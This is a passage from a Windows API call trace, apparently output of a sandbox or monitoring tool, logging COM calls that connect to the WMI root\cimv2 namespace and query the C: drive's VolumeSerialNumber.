[5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0208.207] WbemDefPath:IUnknown:Release (This=0xbe2430) returned 0x3 [0208.207] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0208.207] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0208.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0208.207] WbemDefPath:IUnknown:Release (This=0x6031350) returned 0x2 [0208.207] WbemDefPath:IUnknown:Release (This=0x6031350) returned 0x1 [0208.207] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0208.207] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0208.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031350, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6031350) returned 0x0 [0208.207] WbemDefPath:IUnknown:AddRef (This=0x6031350) returned 0x3 [0208.207] WbemDefPath:IUnknown:Release (This=0x6031350) returned 0x2 [0208.207] WbemDefPath:IWbemPath:SetText (This=0x6031350, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0208.207] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031350, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0208.207] WbemDefPath:IWbemPath:GetText (in: This=0x6031350, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0208.208] WbemDefPath:IWbemPath:GetText (in: This=0x6031350, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0208.208] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031350, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0208.208] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031350, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0208.208] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031350, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0208.208] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031350, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0208.208] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031350, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0208.208] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0208.208] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0208.208] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.208] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0208.208] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0208.208] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0208.208] IUnknown:Release (This=0xb51e34) returned 0x1 [0208.209] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027180) returned 0x0 [0208.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0208.209] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027180, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6030860) returned 0x0 [0208.209] WbemDefPath:IUnknown:Release (This=0x6027180) returned 0x0 [0208.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6030860) returned 0x0 [0208.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0208.209] WbemDefPath:IUnknown:AddRef (This=0x6030860) returned 0x3 [0208.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0208.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0208.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbe25b0) returned 0x0 [0208.209] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe25b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0208.209] WbemDefPath:IUnknown:Release (This=0xbe25b0) returned 0x3 [0208.209] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0208.209] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0208.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0208.209] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x2 [0208.210] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x1 [0208.210] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0208.210] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0208.210] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6030860) returned 0x0 [0208.210] WbemDefPath:IUnknown:AddRef (This=0x6030860) returned 0x3 [0208.210] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x2 [0208.210] WbemDefPath:IWbemPath:SetText (This=0x6030860, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0208.210] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0208.210] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0208.210] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.210] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0208.210] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0208.210] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0208.210] IUnknown:Release (This=0xb51e34) returned 0x1 [0208.211] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6024ea0) returned 0x0 [0208.211] WbemLocator:IUnknown:QueryInterface (in: This=0x6024ea0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0208.211] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024ea0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6027220) returned 0x0 [0208.211] WbemLocator:IUnknown:Release (This=0x6024ea0) returned 0x0 [0208.211] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6027220) returned 0x0 [0208.211] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0208.211] WbemLocator:IUnknown:AddRef (This=0x6027220) returned 0x3 [0208.211] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0208.211] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0208.211] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0208.211] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0208.211] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0208.211] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0208.211] WbemLocator:IUnknown:Release (This=0x6027220) returned 0x2 [0208.211] WbemLocator:IUnknown:Release (This=0x6027220) returned 0x1 [0208.211] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0208.211] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0208.211] WbemLocator:IUnknown:QueryInterface (in: This=0x6027220, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6027220) returned 0x0 [0208.211] WbemLocator:IUnknown:AddRef (This=0x6027220) returned 0x3 [0208.211] WbemLocator:IUnknown:Release (This=0x6027220) returned 0x2 [0208.211] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0208.211] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0208.212] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.212] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6027450) returned 0x0 [0208.212] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027450, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x6033214) returned 0x0 [0208.446] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b404) returned 0x0 [0208.446] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b404, pProxy=0x6033214, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0208.446] WbemLocator:IUnknown:Release (This=0xb5b404) returned 0x1 [0208.446] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b424) returned 0x0 [0208.446] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b404) returned 0x0 [0208.446] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b404, pProxy=0x6033214, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0208.447] WbemLocator:IUnknown:Release (This=0xb5b404) returned 0x2 [0208.447] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x1 [0208.447] CoTaskMemFree (pv=0xbd4918) [0208.447] WbemLocator:IUnknown:Release (This=0x6027450) returned 0x0 [0208.569] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b424) returned 0x0 [0208.569] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0208.623] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0208.624] WbemLocator:IUnknown:AddRef (This=0xb5b424) returned 0x3 [0208.624] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0208.625] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0208.764] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5b384) returned 0x0 [0208.764] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b384, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0208.764] WbemLocator:IUnknown:Release (This=0xb5b384) returned 0x3 [0208.764] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0208.764] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0208.764] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b40c) returned 0x0 [0208.764] WbemLocator:IRpcOptions:Query (in: This=0xb5b40c, pPrx=0xb5b424, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0208.765] WbemLocator:IUnknown:Release (This=0xb5b40c) returned 0x3 [0208.765] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x2 [0208.765] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0208.765] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0208.765] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x6033214) returned 0x0 [0208.765] WbemLocator:IUnknown:AddRef (This=0x6033214) returned 0x4 [0208.765] WbemLocator:IUnknown:Release (This=0x6033214) returned 0x3 [0208.765] WbemLocator:IUnknown:Release (This=0x6033214) returned 0x2 [0208.765] SysStringLen (param_1=0x0) returned 0x0 [0208.765] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031350, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0208.765] WbemDefPath:IWbemPath:GetText (in: This=0x6031350, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0208.765] WbemDefPath:IWbemPath:GetText (in: This=0x6031350, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0208.765] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0208.765] WbemLocator:IUnknown:AddRef (This=0xb5b424) returned 0x3 [0208.765] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b424) returned 0x0 [0208.765] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x3 [0208.765] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x2 [0208.765] WbemDefPath:IWbemPath:GetText (in: This=0x6031350, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0208.765] WbemDefPath:IWbemPath:GetText (in: This=0x6031350, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0208.766] IWbemServices:GetObject (in: This=0x6033214, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x60287e0, ppCallResult=0x0) returned 0x0 [0209.003] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0209.003] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0209.003] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.003] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36521c4*=0, plFlavor=0x36521c8*=0 | out: 